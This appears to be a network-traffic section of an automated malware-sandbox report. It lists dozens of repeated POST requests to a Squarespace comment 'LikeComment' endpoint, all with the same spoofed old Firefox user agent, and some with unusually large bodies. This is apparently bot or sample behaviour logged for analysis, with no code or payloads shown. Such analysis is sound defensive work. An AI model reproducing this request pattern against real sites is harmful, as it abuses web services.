Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 332Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108436Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 332Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108436Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108436Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 332Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
